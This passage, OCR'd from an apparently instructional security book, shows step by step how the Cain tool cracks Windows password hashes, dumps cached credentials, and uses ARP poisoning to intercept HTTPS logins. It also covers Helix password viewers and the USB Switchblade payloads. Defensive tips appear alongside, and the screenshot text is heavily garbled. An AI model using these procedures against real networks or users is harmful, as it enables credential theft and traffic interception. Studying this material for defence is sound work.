ActiveSync ^| NTLM Session Security Hashes 


After selecting the type of hash, the Cain program will display the Brute-Force Attack screen. 
At this screen, the user can choose from a list of predefined character sets or create their own 
custom character set. The predefined character sets include uppercase, lowercase, numbers, and 
special characters. The more extensive the character set is, the longer it will take the brute force 
attack to work. In this case, I am selecting the default option because I know the password for 
this account is all uppercase characters. Click Start to begin the attack. In this case, the plain text 
password of KIM was revealed in less than a second. A brute force attack is effective when you 
have ample time at your disposal or when the user has an extremely simple password. 


Brute-Force Attack 


Plaintext of AAD3B435BS1404EE is 
Plaintext of D7D776BDCC666FB2 is KIM 


Attack stopped! 
2 of 2 hashes cracked 


For demonstration purposes, add a user to the local system with a password that is in the 
default wordlist included with Cain. Open a command prompt on the local system and type the 
following command to add a user called hacker with the password of whitsun: 

net user hacker whitsun /add. 


` C:\WINDOWS\system32\cmd.exe 


cC-X»nertcusen 


The command comple 


Right click in the right-hand window in Cain, and select remove all to remove all local accounts 
from the list. Click the Yes radio button to the question “Delete all entries?” Right click on the right 
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pane again in Cain and select Add to list then click Next. Your new user hacker should appear in the 
list. Right click on the user hacker and select Dictionary Attack. If you are conducting a dictionary 
attack against a Windows XP, NT, 2000, or 2003 system, select LM Hashes. If you are conducting 
the attack against a machine running Vista, Windows 7, or Windows 2008, select NTLM Hashes. 
In the Dictionary Attack windowpane, right click and select Add to list. Browse to C:\Program 
Files Cain Wordlists and double click on Word Lists. Click the Start button. 


Dictionary Attack 


vf C^Program FilesNCainNW'ordlistsNWordlist bit 


Key Rate 


[^ Asis (Password) 

Iv Reverse (PASSWORD - DROWSSAF) 

Iv Double (Pass - PassPass) 

[^ Lowercase (PASSWORD - password) 

IV Uppercase (Password - PASSWORD) 

Iv Num. sub, perms (Pass.P4ss,Pa5s,...P45s...P455) 
[ Case perms (Pass.pAss.paSs....PaSs...PASS) 

Iv Two numbers Hybrid Brute (Pass0....Pass99) 


Dictionary Position 


Plaintext of AAD3B435B51404EE is 
Plaintext of ABEC732708AF4AEC is WHITSUN 
Attack stopped! 

2 of 2 hashes cracked 


In this example, we will use one of the wordlists from the Church of the Swimming Elephant. 
Use on the following link to get a large word list of female names: http://www.cotse.com/ 
wordlists/n_female. Highlight from the starting point of # “Names of women from lots of lan- 
guages” and hold down the Shift button. Scroll to the end of the webpage, where it states the name 
zuzana. Right click and select Copy. Open a blank Notepad (not Wordpad) document and paste 
all of the text into the file. Save the file on your desktop as "Women." 

For demonstration purposes, add a user to the local system with a password that is in the cus- 
tom word list from the Church of the Swimming Elephant. Open a command prompt on the local 
system and type the following command to add a user called haxOr with the password of ramonda: 
net user haxOr ramonda /add. 


=< C:\WINDOWS\system32\cmd.exe [-|o[ x] 


c:\>net user haxOr ramonda /add 
The command completed successfully. 


Right click in the right-hand window in Cain, and select remove all to remove all local accounts 
from the list. Click the Yes radio button to the question “Delete all entries?” Right click on the 
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right pane again in Cain and select Add to list then click Next. Your new user haxOr should appear 
in the list. Right click on the user haxOr and select Dictionary Attack. If you are conducting a 
dictionary attack against a Windows XP, NT, 2000, or 2003 system, select LM Hashes. If you 
are conducting the attack against a machine running Vista, Windows 7, or Windows 2008, select 
NTLM Hashes. In the Dictionary Attack window pane, right click on C:\Program Files\Cain\ 
Wordlists\wordlist and click remove all. Click Yes to the warning message box. In the Dictionary 
Attack windowpane, right click and select Add to list. Browse to the Notepad file you created on 
your desktop called Women. Click the Start button. 


Dictionary Attack 


f C:\Documents and Settings\Administrator\Desktop\wom... 32854 


Key Rate Options 
[ As lIs (Password) 
Dici Posi Iv. Reverse (PASSWORD - DROWSSAP) 


¥ Double (Pass - PassPass) 

[^ Lowercase (PASSWORD - password) 

Iv Uppercase (Password - PASSWORD) 

Iv Num. sub. perms (Pass P4ss Pa5s, ..P45s.. P455) 
Current password [^ Case perms (Pass.pAss.paSs. ..PaSs... PASS) 

Iv Two numbers Hybrid Brute (Pass0....Pass99) 


Plaintext of AAD3B435BS1404EE is 
Plaintext of F1E36CA07764807D is RAMONDA 
Attack stopped! 

2 of 2 hashes cracked 


Using the Cain program with rainbow tables that were created using Winrtgen (or some other 
program) is an extremely effective way to crack passwords. A copy of Winrtgen is provided for 
users in the CAProgram FilesWinrtgen folder when Cain is installed. Rainbow tables can take 
hours, days, or even years to create depending on items like the character set you are using and the 
processing power of your machine. We will now demonstrate how to use the rainbow table created 
earlier in this chapter to crack a password. 

The rainbow table created in the example only had capital letters within the character set. For 
demonstration purposes, we will create a user with a 14-character password and see how long the 


password takes to be revealed. Open a command prompt, and type the following command: net 
user elitehaxor MEAELITEHAXOR /add. 


CUNG X N ITEHACKER /add 
ssfully. 


Right click in the right-hand window in Cain, and select Remove All to remove all local 
accounts from the list. Click the Yes radio button to the question “Delete all entries.” Right click 
on the right pane again in Cain and select Add to list, then click Next. Your new user elitehaxOr 
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should appear in the list. Right click on the user elitehaxOr and select Cryptographic Attack select 
the hash type, and select via RainbowTables (RainbowCrack). If you are on a Windows XP, NT, 
2000, or 2003 system, select LM Hashes. If you are on a Vista, Windows 7, or Windows 2008 
system, select NTLM Hashes. 


80... | 09FEF4724728. 
Dictionary Attack b | * empty" AAD3B4358514... 31D6CFEOD16A... 
ARFC73I27NRAF FSRRARINRA3A 


5 
3 
P] _Cryptanalysis Attack M Hashes via RainbowTables (OphCrack) 
l LM Hashes + chalenge — » <<a RainbowTables (RainbowCrak) —— 
; PEN "^ HALFLM Hashes + challenge >| — via FastLM Rainbow Tables (Winrtgen) 
> ActiveSync > NTLM Hashes L 
) NTLM Hashes + challenge > 
2 


AABBIBDBESEC... C18D205C3302... 
SOBOECICSBDC... EAS4CCD01049... 
AAD3B435BS14... 4B89F0813891... 


Click add table and browse to the location of the rainbow table created earlier in the chapter. 
Click Start and relax while the passwords are cracked. The hash must be within the rainbow table 
in order for the password to be hacked. In this example the password MEAELITEHACKER is 
found in less than 23 seconds. 


LM Hashes cryptanalysis 


+ Sorted Rainbow Tables 


of C\Documents and Settings\Administrat... Im alpha 


r Statistics 
Plaintext found: 2 of 2 (100.00) Total chain walk step: 2561536 
Total disk access time: 14.49 s Total false alarms: 12888 

à Total false alarm step: 17189497 


Reading lm_alpha#1-7_0_ deri pe oxid#000.rt ... 
. 640000000 bytes read in: 


Plaintext of 257aeSfa0832374f is EHACKER 
Cryptanalysis time: 22.95 s 


Usernane Passvord 


elitehaxür MEAELITEHACKER 


Obtaining Windows Passwords Ww 63 


The first tab in the Cain program, Decoders, will allow you to retrieve a variety of cached pass- 
words, including wireless passwords, Internet Explorer passwords, and passwords for Windows 


mail programs. 


To reveal passwords on the local system, click on the password type you are trying to find, 
such as Wireless Passwords, and click the blue plus button above the word Sniffer. If any such 
cached passwords exist on the system, they will be revealed to you in the Windows pane under 
the Password column. 


a2 Oh Do swsdummmasoce:9? i 
[Æ Cached Passwords SSS 


Protected Storage ISthisMYrealPA D Expre: count 
» nibus ME IdentitiesPass Outlook Express Identity 
(B 1E7 Passwords 
Windows Mail Passwords 
Dialup Passwords 
fem Edt Boxes 
Enterprise Manager 
TP Credential Manager 


The passwords can be exported to a text file by right clicking on the password and selecting 
Export. The Cain program will include all of the details about the account including username, 


password, and account type. 


P pass - Notepad 
File Edit Format View Help 


EEZZZEEEEZEZZEEZEEEZZZEZEEEEZEZESZEEEZZEZEZZEEEZEZEZZESZZEZESZSEZE:A 


= Cain's Protected Storage Password Manager 


Resource: mail.jessel.net 
Username: jesse 

Password: IsthisMYrealPASSWORD 
Type: Outlook Express POP3 Account 
Identity: Main Identity 


€ 


If your machine is connected to a network, you can use the Cain program to enumerate all 
kinds of information about the other computers on the network. The Cain tool allows the user to 
find Microsoft Windows computers, Apple file servers, Novell servers, dial-in servers, SQL servers, 
domain controllers, print servers, terminal servers, and time servers. 
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g Entire Network 
= At Microsoft Windows Network 
+] All Computers 
@ Apple File Servers 
Browsers 
233 Dial-In Servers 
Domain Controllers 
Novell Servers 
$$ Printer Servers 
SQL Servers 
Terminal Servers 
S5 Time Servers 
.f* Quick List 


Although current Windows operating systems are more locked down than they have been 
in the past, you can still use the Cain program to reveal information about older machines (and 
some newer) on the network, such as open shares and the services that the remote computer is run- 
ning. Newer operating systems such as Server 2008 and Vista are "very locked down" by default. 
Without the username and password to the local machine, it is unlikely that you will get informa- 
tion about users, groups, shares, or the registry. On older operating systems like Windows 2000, it 
may be possible to enumerate information about users, groups, shares, or the registry. 


: $ Network [19 sniffer | [Eb Query | 
g Entire Network 
=| «d Microsoft Windows Network @ recs Remote IPC 1 Unlimited 
=), WORKGROUP Æ ADMIN Remote Admin C:\WINNT 0 Unlimited 


T 3 B aces fac Default share CA [] Unlimited 


The Network tab of Cain can be used as a tool for auditing your internal network. Without 
using the username or password, see how much data you are able to harvest from remote systems. 
In some cases, you will still be able to get a sufficient amount of information without providing a 
username or password. 

If you have the username and password to the remote system, you can use the Cain program 
to connect to the remote system. Right click on the machine in the list you would like to connect 
to and choose “Connect as.” If you do not have the password to the remote system, you may be 
able to find them though the Sniffer tab or through other methods discussed within this book. The 
good news from a hacking standpoint is that there is no limit to the number of attempts you can 
try to make as the administrator account. This, of course, is bad news from a security standpoint. 


Credentials required 
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The Sniffer tab of Cain can wreak a lot of havoc on a network. Cain’s sniffer is an extremely 
powerful tool that can be used to perform man-in-the middle attacks. A man-in-the-middle attack 
is when a computer gets between two computers that are having a conversation. Plain-text pass- 
words can be stolen if a system gets between your computer and the computer you are communi- 
cating with. Even worse, encrypted sessions can be hijacked and all traffic can be revealed in plain 
text to the attacker. Using the ARP poisoning feature of Cain, I was able to get usernames and 
passwords from both encrypted and unencrypted sessions. 

To capture plain text data in transmission using Cain, perform the following steps: 


1. Click on the Sniffer tab, and select Configure from the Cain menu bar. Select the interface 
(network card) with the correct Internet protocol (IP) address and click the Apply button. 


Filters and ports | HTTP Fields | Traceroute | Certificate Spoofing | 
Sniffer | APR (Ap Poison Routing) | Challenge Spoofing | 


Mg Device WPF. (3441284... 
«| m 

r- Winpcap Version 
410.1452 


Current Network Adapter 
\Device\NPF_{32299EF3-8007-423F-BA34-122D181990E7} 


WARNING !!! Only ethemet adapters supported 


r Options 
[ Start Sniffer on startup [~ Dont use Promiscuous mode 
[^ Stat APR on startup 


Fiters and ports | HTTP Fields | Traceroute | Certificate Spoofing | 
Snfer APR(Amp Poison Routing) | Challenge Spoofing | 


eg 
C Use Spoofed IP and MAC addresses 
IP: | 255 . 255 . 255 . 255 MAC: | 001122334455 


~ Pre-Poisoning ———————————— 
IV Pre-Poison ARP caches (Create ARP entries ) 


r- Poisoning 
Poison remote ARP caches every: [031 seconds 
C Use ARP Reply Packets 


(* Use ARP Request Packets (More Network Traffic) 
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3. Select both the green network icon and yellow ARP poison routing icon next to the folder 
in the menu bar. 


File 


EI 


4. Verify that the Hosts tab is selected in the lower left-hand corner of the Sniffer tab. Click the 
blue plus sign above the word "Sniffer" and the OK button to scan all of the MAC addresses 
on the network. The list will be populated with MAC addresses and their corresponding IP 
addresses. 


"a — ree 


alelo kEm v ss5smmHEgBOS709?!n 
Decoders [ 9 Network [89 Sniffer [af Cracker [4 Traceroute [E ccou [i Wireless [85 Query 


Promiscuous-Mode Scanner 
[^ ARP Test (Broadcast 31-bit} 
[ ARP Test (Broadcast 16-bit) 


[^ ARP Test (Multicast group 1] 
[^ ARP Test (Multicast group 3) 
I AlTests 


5. In the bottom left of the Sniffer menu bar, select the Password tab (fourth from the right). 
Click on the various fields, such as FTP and HTTP, to view various IP addresses, user- 
names, passwords, hashes, and URLs that people on the network are using. 


File View Configure Tools Help 


EPIITIILEUEIUPI LT EI-E ILE AE 


È Decoders [9 Network [19 Sniffer [of Cracker [@ Traceroute [MM ccou [9 Wireless [Ep Quey | 


Wy Passwords ^ [Timestamp [FTPserver | Client 
w ~ (j[o082000-144955 20746236102 10.10149 anonymous  IEUser® 
HPA / . 
6| 77—— gos» 14 
[E Hos [E AR [E Routing [P Passwos | 
http-//www.oxid.it 


The ARP pane of Cain allows users to hijack other communications, including DNS, SSH, 
HTTPS, RDP, FTPS, POP3S, IMAP3, LDAPS, and SIPS. When traffic such as HTTPS is 
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hijacked, the user will be warned that the certificate is invalid. They would need to click Continue 
to be able to access the site. If the user is very security conscious, they probably will not allow 
themselves to be hijacked. However, if the user clicks Continue to this website, you may be able to 
steal their username and passwords and view their encrypted session in plain text. 


Certificate Error: Nay - = 

E) https://my.champlainedu/portal/logout ~» | ++ | X IPB Google P 
Ele Edit View Favorites Tools Hep 
Sp Favorites | @ Certificate Error: Navigation Blocked fy By (bo Pager Safety Toos Qr 


Q There is a problem with this website's security certificate. 


The security certificate presented by this website was not issued by a trusted certificate authority. 


Security certificate problems may indicate an attempt to fool you or intercept any data you send to the 
server. 


We recommend that you close this webpage and do not continue to this website. 
@ Click here to dose this webpage. 


e Continue to this website (not recommended). 


(9 More information 


m ] D 


@ Internet | Protected Mode: Off fay ®100% v 


To hijack HTTPS sessions using the Cain program, perform the following steps: 


1. Be sure that the sniffer and ARP program are running. Click the Hosts tab in the lower 
left-hand corner of Cain. Click the blue plus sign and the OK button to scan all the MAC 
addresses in the local subnet. 

2. Click the ARP button in the lower left-hand corner of the screen and the ARP button at the 
top of the list in the left-hand pane. Important: To enable to blue plus sign, click in the top 
windowpane under the word “Status.” Once you click into the pane, click the blue plus sign 
to start hijacking traffic. 


APR-Cert (3) 
3, APR-DNS 
IB APR-SSH-1 (0) 
Ê APR-HTTPS (70) 
SH APR-RDP (0) 

8 APR-FTPS (0) 

B) APR-POP3S (0) 
B) APR-IMAPS (0) 
B) APR-LDAPS (0) 
B) APR-SIPS (0) 


Click in this window and the blue 
plus sign will become available 


[Status | IP address | MAC address _| Packets -> | <- Packets | MAC address | P address — | 


Lost packets: 0% 4, 
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3. The New ARP Poison Routing screen will present you with a list of MAC addresses and 
their corresponding IP addresses. Select the gateway from the left list (usually X.X.X.1) and 


the machine you want to launch the man-in-the-middle attack against from the right, and 
click OK. 


New ARP Poison Routing 


WARNING II! 


PR enables you to hijack IP traffic between the selected host on the left list and all selected hosts on the right list in both 
| |directions. If a selected host has routing capabilities WAN traffic will be intercepted as well. Please note that since your 
machine has not the same performance of a router you could cause DoS if you set APR between your Default Gateway and 
all other hosts on your LAN, 


Hostname 
001F901978E3 Wireless Broad... | 192.168.1,200 0013722F8762 CLIENT4 
000C292688A7 2kserver.home 192.168.1.101 00211E7F3FDC IP-STB1.home 
000C294D6FBC bt.home 192.168.1.6 000C294D6FBC bt.home 
00211E7F3FDC IP-STB1.home 192. 2 000C292686A7 
192.168.1.200 0013722F8762 CLIENT4 


4. The status window will then populate with the IP and MAC addresses of the two machines 
that Cain is getting between. 


MAC address <- Packets | MAC address IP address 
001F901978E3 192.168.1.2 
0 E OD0CZ94D6FBC |19; .1.6 


BB aPR-SSH-1 (0) 

& APR-HTTPS (57) 
APR-RDP (0) 

5) APR-FTPS (0) 
APR-POPS3S (0) 


A app-idaps (m ~ 


5. For demonstration purposes as the victim, I clicked Continue after the Internet Explorer 
security warnings appeared. In this case, I was able to steal the username and password from 
and encrypted logon session. I found the username and password I entered in the Passwords 
tab on the bottom left side of Cain under HTTP. 


File View Configure Tools Help 
38 OG dade md v o. TUeeeeOegs2 oO? h 


HTTP server. Gent Username. ^ 


URL A 
FTP (1) = 216,93.150.198 — 192.168.1.6 jvarsalone https:j/my.champlain.edu/portalfif/owa,php ¥ 
> 
59 imap (0) 
< 


6. You can navigate to the folder C:\Program Files\Cain\HTTPS to view all of the HTTPS 
traffic. Each session that is hijacked will have a corresponding text file created for it. I found 
the test email that I sent over HTTPS revealed in plain text. 
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E. HTTPS-2009726151333968-58062 - Notepad 
File Edt Format View Help 


Accept-Charset: I50-8859-1,utf-8;q-0.7,*;q-0.7 


Keep-Alive: 300 . 
Connection: keep-alive 


Referer: https://webmail. champlain.edu/owa/?ae-Itemát-IPM.NOte&a-New 
Cookie: mycc ss-2; cctoken-a7o0XeFrUNwigdLAMeHOYSpniTacsOSATBSIMTENZFET IPSO E SoROFDS 7h nr Ont rat 5; 


Content-Type: appl ication/x-www-form-ur 


Content-Length: 264 


encoded 


hidpnst-&t xtto-jvarsaloneX40champlain. edu&t xt cc-&t xtbcc-&t xt sbj -test&t xt bdy-(EEREXSIEMI I &hidid-&hi 


cache-control: no-cache 
Pragma: no-cache 
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You can avoid having your encrypted session hijacked by paying close attention to any certificate 
warnings you receive in your browser. If you are visiting an HTTPS website, and you receive 
an error about a problem with the website’s certificate, do not click “Continue to this website.” 
Microsoft does not recommend that you do this for a reason. Once you click Continue in Internet 
Explorer, you are in trouble. The URL bar will become red and a certificate error message will be 
displayed in the top right side of the browser. 


[> My.Champlain - Champlain College - Windows Internet Explorer 


Go gle | 


Ve Be |Æ My. Chemplein - Champlain College 


Campus Information Departments + Services 


Events Calendar 


Vinyasa Flow Yoga 


More events >> 


Extended Calendar 


People Directory Search 


Last Name [Search | 


Search by Department | Faculty Websites 


Campus Forecast 


fc B)-c dh [Gt oge - G Tools - 


Clubs * Organizations Quick Links 


ON CAMPUS & MY DASHBOARD 


Administrative Alerts 


Register Here for Campus Alerts 
Use the link above to register for emergency Campus Alerts. For instructions, please 
more info link. More Info... 


Datatel System Downtime 


Scheduled Datatel system down time for system maintenance on 8/11/09 from 7:304 
8:30AM 


On-campus Class Cancellation Information 
Information regarding cancellations of current courses may be found here. 


[Resources 


Login to Chalk & Wire ePortfolio 


Important Housing Selection Information for all Students 


Student Accounts 


On Campus Dining 


Sh Pri 


manhattan.champlain.edu (For ITS students) 


Eor 


Fern dhe a’ 9 Osn- 


[e Q internet 


A user could be hijacked in one click using Internet Explorer. Even though the browser bar 
has a certificate error, it is still possible that an unsuspecting user would click Continue once and 
ignore the certificate error message in the browser bar. I have actually worked for a company that 
forced their employees to click Continue, despite getting these certificate errors, because they had 
issues with their certificate authority. Users in a situation like that would be easy prey for a man- 


in-the-middle attack using Cain. 
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Instead of exclusively using Internet Explorer, the use of the Firefox browser in a corporate or 
personal environment may be worth considering. While a user can be owned in a single click with 
IE, the Firefox browser makes a user click continue four times before allowing them to continue 
on in their HTTPS browsing process. For this reason, you may want to consider the use of the 


Firefox browser when visiting secure sites. 


For the Firefox users of the world, a similar warning will appear, stating that a “Secure 
Connection Failed.” Unless you want your personal information stolen, do not click the add an 


exception link (There is a blue link in at the bottom of the page.) 


) Page Load Error - Mozilla Firefox 
File Edt View History Bookmarks Tools Help 


C X 


(a) ( Æ hitps:[my.champlain.edujportalmain.htmi 


|B) Most Visited fle Getting Started A. Latest Headlines 


Secure Connection Failed 
my.champlain.edu uses an invalid security certificate. 


The certificate is not trusted because the issuer certificate is unknown. 


(Error code: sec error unknown issuer) 


= This could be a problem with the server's configuration, or it could be someone 


trying to impersonate the server. 


= If you have connected to this server successfully in the past, the error may be 


temporary, and you can try again later. 


Or you can add an exception. 


Even if you do click the add an exception link, there are additional steps to take with Firefox 
before your secure information will get stolen. The user will also need to click the Add Exception 


button an additional time. Smart users will choose “Get me out of here!” 


2 Page Load Error - Mozilla Firefox 
Ele Edt View History Bookmarks Tools Help 


-~ GX @ (A | hetps:ttmy.champlain.edujportalfmain. herd 


[È Most Visited @ Getting Started i Latest Headlnes 


A 


Secure Connection Failed 
my.champlain.edu uses an invalid security certificate. 
The certificate is not trusted because the issuer certificate is unknown. 


(Error code: sec. error. unknown, Issuer) 


= This could be a problem with the server's configuration, or it could be someone 
trying to impersonate the server. 


= If you have connected to this server successfully in the past, the error may be 
temporary, and you can try again later. 


You should not add an exception if you are using an internet connection that you do not trust 
completely or if you are not used to seeing a warning for this server. 
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Even after choosing to add an exception two times, there are additional steps to take with 
Firefox before you visit an “untrusted site.” The Firefox user still needs to click Get Certificate and 
then click the Confirm Security Exception box at the bottom of the screen. Notice that the warn- 


ing says that legitimate banks, stores, and other public sites will not ask you to get a certificate and 
confirm a security exception. 


Add Security Exception 


You are about to override how Firefox identifies this ste. 
UN Legitimate banks, stores, and other public sites will not ask you to do this. 


Server 


Location: | https://my,champlain.edu/portal/main. htm! 


Certificate Status 
This site attempts to identify itself with invalid information. 


Unknown Identity 
Certificate is not trusted, because it hasn't been verified by a recognized authority, 


Permanently store this exception 


Confirm Security Exception 


Helix 


Helix is a Live CD from E-fense that is often used by people in law enforcement. Helix allows 
users to image drives and to collect important artifacts as well as volatile data from a system. Once 
the system is turned off, volatile data information obtained from RAM will no longer be present. 

Recently, Helix began offering more than one version of their live CD. E-fense now has several 
pay versions of their product including Helix Enterprise, Pro, and Response. Their prices are rela- 
tively inexpensive compared to that of other companies that offer similar products. Fortunately, 
they still are offering a free version of their product called Helix 3. To get Helix 3, go to http:// 


www.e-fense.com/products.php and click on the small Helix 3 link in the top right-hand corner 
of the screen. 


WA —fense = Cyber Security & C 7 - Int = ] 
Poor e-fense.com/ products. php SBAA [PSS [E DOES 
File Edit View Favorites Tools Help 
we Favorites | @ e-fense :: Cyber Security & Computer Forensics S... a~ ~ (1 dm ~ Pager Safetyy Toos @~ ” 
C fe 5 ABOUTUS KEDO) RECENTNEwS | CONTACT * 
4-fense — 
CARPE DATUM " 
HOME PRODUCTS TRAINING SUPPORT CLIENTS. SHOP [ 
Don't let your company data walk out the door! Quick Contact Form: 
e-fense has options to meet your computer forensics and cyber security needs. pst terme. 


+ Ifyou need visibility of your entire network to protect against malicious behavior, policy violations and hacking “tact Name: 
you need Helix3 Enterprise 


* Ifyou need to acquire Internet History, Passwords and RAM data you need Live Response *Phone Number: 


* Ifyou need forensic disk imaging across multiple platforms or safe forensics platform for system previews 
you need Helix3 Pro “Email Address E 


, 
@ Internet | Protected Mode: Off fa > 100% + 
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Once you click on the link, you will be required to provide a first and last name, email address, 
and a contact phone number. After providing the required information, a link will be sent to your 
email so that you will be able to download the Helix 3 ISO file. The link provided by E-fense is 
only good for fifteen minutes, so don’t waste a lot of time. Once you download the ISO file, you 
can use ImgBurn to burn the file to CD. Open your ImgBurn application and select Write image 
file to disc. Browse to the location of the Helix2009R1.iso file on your hard disk, insert a blank 
CD and click Write. 


File View Mode Tools Help 


Source TEAC DV-W28EC B.0A (ATA) 
S D:\Helix2009R1.iso j Current Profile: CD-R 

Label: Helix2008R1 pb ieri 

ImpID: Unknown Erasable: No 

File Sys: ISO9660 (Bootable), Joliet Free Sectors: 359,844 

Free Space: 736,960,512 bytes 
Free Time: 79:59:69 (MM:SS:FF) 


Sectors: 356,881 (MODE1/2048) Supported Write Speeds: 4x, 10x, 16x, 20x, 24x 


Size: 730,892,288 bytes 
Time: 79:20:31 (MM:SS:FF) wD ‘ ATIP Information: 

Start Time of LeadIn (MID): 97m26s66f 
Destination Last Possible Start Time of LeadOut: 79m59s71f 


[4s :0:01 TEAC Dv-w28EC (3 
(9 E Test Mode [V] Verify 


Settings 


Write Speed: |AUTO 
e > " — 
Copies: 


Helix has some very impressive incident response tools that would be useful for harvesting 
information from a person's computer. In general, "good guys" use the Helix CD to get informa- 
tion such as passwords from "bad guys." However, bad guys could potentially utilize the tool to 
extract personal information off of a user's system. 

To use Helix to extract information off of a system, insert the CD, and perform the following 
steps: 


1. Disable antivirus on the machine. Some of the tools cause antivirus to fire off because the 
tools are extracting password information from the target system. The steps to disable anti- 
virus can vary depending on your vendor. With Symantec Norton Antivirus, just right click 
on the shield and select the checked Enable Auto-Protect option. This will disable the anti- 
virus software and the shield. 


Open Symantec AntiVirus... 
v Enable Auto-Protect 


2. When you first insert the Helix CD, you will see a Warning screen. The disclaimer basically 
explains to people doing incident response that running these tools will alter the system. 
Altering the system can include things like changing memory as well as date and time stamps 
on files and folders. Click the Accept button if you agree to the conditions. 
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IS Hux2009R1 (01/06/2005) 


> 


You are running this application in a LIVE Windows 
environment. There is ABSOLUTELY NO WAY to protect 
this live environment from changing. 


This application WILL make changes to the running 
system. This is an accepted risk you must be willing to 
take. 


a.a arse 


A If you are not willing to accept this risk or do not 
333 understand what you are doing then exit now, otherwise 
agree and proceed at your own risk.... 


Brought to you by: 


r ; Choose Your Language: EXE ^ ^ ^ | 


http://www.e-fense.com 


f dese l Accept oi MON Exit 


3. Click on the icon of a magnifying glass and memory chip icon to launch the incident 
response tools for Windows systems. There are actually three pages of incident response 
tools. Helix will automatically take you to page 1. 


ag POCEDI CELE © LETTE ECOD NEIES CORT EIE FDEP EIS 


= QuickLaunch Page Help E 


= Incident Response Tools for Windows Systems. 


4, Page 1 of the incident response tools includes the Windows Forensic Toolchest, First 
Responder Utility, IR Collection Report, Agile Risk Management’s Nigilant32, and the 
ability to start a Netcat Listener. Many of the tools on the first page do not always work 
properly or have expired licenses. The Netcat Listener tool will be examined in Chapter 3. 
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j 06/2009 — — 
File Quick Launch Page Help 


Incident RESPONSE 


5. Click the top arrow button to reach page 2 of Helix's incident response tools. Notice that 
the number 2 is displayed in the incident response icon. The top of page 2 has an area where 
individual files can be hashed. To hash any file on the system, click the Browse button 
directly above the Hash button, select the file you wish to hash and click the Hash button. 
Other tools include a trusted Command Shell, VNC Server, PuTTY SSH, WinAudit, File 
Recovery, Rootkit Revealer, Screen Capture, and a PC On/Off Time utility. Several of these 
utilities will be examined in Chapter 3. 


F QuickLaunch Page Help 
Incident Response 


I ————sDe, — | 
E ep Hash | 
a Ei 
C @ 


Dr 
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6. Click the top arrow button to reach page 3 of Helix’s incident response tools. The number 
3 is displayed in the incident response icon. Page 3 is where the majority of password view- 
ing tools within Helix exist. The password recovery tools included with this distribution 
of Helix include viewers for PST passwords, mail passwords, network passwords, IE pass- 
words, protected storage, and an asterisk logger. I suggest you run all of these tools to harvest 
as many passwords from the user’s system as possible. Sometimes the IE Password Viewer 
will yield no results but several IE passwords will be found in the Protected Storage Viewer. 
While these tools do work on some systems under certain conditions they will not always be 
able to retrieve passwords. Other useful information about the user's surfing habits can be 
retrieved by using Helix's IE history and cookie viewer, as well as the Mozilla cookie viewer 
if they have been using Firefox. 


When the user drags their mouse over any of the tools in the list, they will be provided with a 
description of what each tool does at the bottom of the screen. 


Fil 


Launch any of the utilities by dragging your mouse to the icon and double clicking on it. 


W The PST Password Viewer utility is useful if the user chooses to password protect their 
Outlook inbox. Users sometimes will password protect their PST files by setting a pass- 
word on their personal folders. This is done by right clicking on Personal Folders, selecting 
Properties, and clicking Change Password. 
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© Inbox - Microsoft Outlook 


Personal Folders 


Changes the password used to access 
SV the personal folder file 


|. © Show number of unread items 
© Show total number of items 


While most people may think the emails within their PST file are safe from prying eyes after 
they password protect it, they are wrong. This tool from Nirsoft, http://www.nirsoft.net/, allows 
Helix users to find several passwords that will open the PST file. 

To use the PST Password Viewer: 


1. Double click on the PST Password Viewer on page 3 of Helix's incident response tools. 

2. Click Yes to the message that “you are about to run the Helix PST Password Viewer from 
Nirsoft, is this OK?" 

3. There will be three passwords that can be used to open the PST file. Any of the three pass- 
words will open the file. If you want more, right click and select Get More Passwords. One 
is really all you need to open the PST file. 


$8 PstPassword 
File Edit View Help 


SHAS aA 


Encryption 


Compressible 


The Protected Storage Password Viewer may provide you with passwords and usernames that 


are stored with auto complete. 
To use the Protected Storage Password Viewer: 


1. Double click on the Protected Storage Password Viewer on page 3 of Helix’s incident 


response tools. 
2. Click Yes to the message that “you are about to run the Helix Protected Storage Password 


Viewer from Nirsoft, is this OK?” 
3. Usernames and passwords such as AutoComplete Passwords and Outlook Express may be 


displayed. 
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7] Protected Storage PassView 


File Edit View Help 


[da % dA 2) 

imail. jesse1.net Outlook Express jesse ISthisMYrealPASSWORD 
(SlidentitiesPass Outlook Express Identity Main Identity 

E https://www. google.com/accountsjLogin AutoComplete Passwords defenseblackarts NI 


€ https://www.google.com/accounts/LoginAuth AutoComplete Passwords blackartsdefense E-— 


To avoid getting “owned” by a hack tool that harvests passwords from auto complete forms, peri- 

odically clear your auto complete fields or avoid using them altogether. And, never, ever use auto 

complete when you are using a public computer, such as a hotel kiosk or a computer in a library. 
To clear your auto complete forms in Internet Explorer: 


1. Open Internet Explorer, click on Tools and select Internet Options. 

2. Click the Content tab. Click the second tab from the bottom to adjust your auto complete 
settings. 

3. Click the Delete AutoComplete History button. 


Programs | Advanced 
Parental Controls 
Control the Internet content that can | (ff Parental Controls 
be viewed. 


Content Advisor 


Ratings help you control the Internet content that can be 
viewed on this computer. 


(mee. ) | Psetinas 


Certificates 


Use certificates for encrypted connections and identification. AutoComplete lists possible matches from entries you ve 
R typed or visited before. 


) Use AutoComplete for 
[V] Address bar 
AutoComplete [V] Browsing history 


2 AutoComplete stores previous entrie@] Settings — 7 [V] Favorites 


on webpages and suggests matches “Ste 
for you. (Feeds 
Feeds and Web Slices Use Windows Search for better results 


Feeds and Web Slices provide updated = 
[V] User names and passwords on forms 


content from websites that can be 
read in Internet Explorer and other V] Ask me before saving passwords 


programs. 
— 
Ce taconite ty 
et Autocont st 


{ Gear ssi state |{ Certificates || — Publshers 


Switchblade 


Recently, a lot of agencies stopped allowing USB drives to be attached to their network. One of 
the reasons for this is tools like Amish and Switchblade that allow individuals to put malicious 
payloads on their USB devices. The people at Hak5 have compiled a wiki on how to include these 
malicious payloads on USB devices. More information is available at http://wiki.hak5.org/wiki// 
USB_Switchblade. This site also explains how the Sandisk USB U3 technology can be leveraged 
to exploit systems. Files that are considered to be viruses or malware cannot be deleted or quar- 
antined when they exist on a U3 partition. The U3 partition is read-only and cannot be modified 
without special software. There is a program called the Universal Customizer that will allow you 
to edit and add files to the special U3 partition on Sandisk USB drives. To get this program, 
go to http://gonzor228.com/download/ and download the latest version of Switchblade and the 
Universal Customizer. Unzip both of the files. 
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@GonZor228.com » Download - Windows Internet Explorer m AX] 
Go- o | 


File Edt View Favorites Tools Help 


x €- 


Download 


GonZor's Payload 


Latest Release: 


-V2.0 Series Stable Release 
MDS Sum:2f2db56328139ac76ae14de8883876b2a 


